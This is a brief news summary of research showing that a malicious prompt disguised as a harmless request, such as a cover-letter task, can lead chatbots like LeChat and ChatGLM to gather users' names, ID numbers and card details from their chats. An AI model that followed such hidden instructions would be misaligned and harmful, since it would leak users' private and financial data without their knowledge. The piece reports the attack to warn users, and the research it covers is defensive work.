Researchers Uncover Major Chatbot Vulnerability: Sensitive Data at Risk

October 20, 2024
Researchers Uncover Major Chatbot Vulnerability: Sensitive Data at Risk
  • A research team from the University of California, San Diego, and Nanyang Technological University has demonstrated a method to extract sensitive data from chatbot interactions.

  • The researchers created a malicious prompt that instructs AI to gather personal data such as names, ID numbers, and credit card details from user chats.

  • This harmful prompt can be disguised as a request for legitimate tasks, like writing a job cover letter, making it difficult for users to identify the threat.

  • The hack was successful on AI chatbots like LeChat from Mistral and ChatGLM, although Mistral has since addressed the vulnerability.

  • Prior to this, a similar hack was reported that exploited a bug in the ChatGPT app for Mac, which has since been fixed.

  • Given these vulnerabilities, users are advised to avoid sharing sensitive information with AI until adequate protections are established by companies like OpenAI and Mistral.

  • Users should be cautious about sharing personal information with chatbots like ChatGPT due to risks of data misuse and hacking.

  • To mitigate the risk of executing harmful commands, it is recommended to avoid copying prompts from the internet and to type prompts directly.

  • Looking ahead, as on-device AI becomes more advanced, users may be more willing to share personal data, provided that robust security measures are in place.

Summary based on 1 source


Get a daily email with more Tech stories

More Stories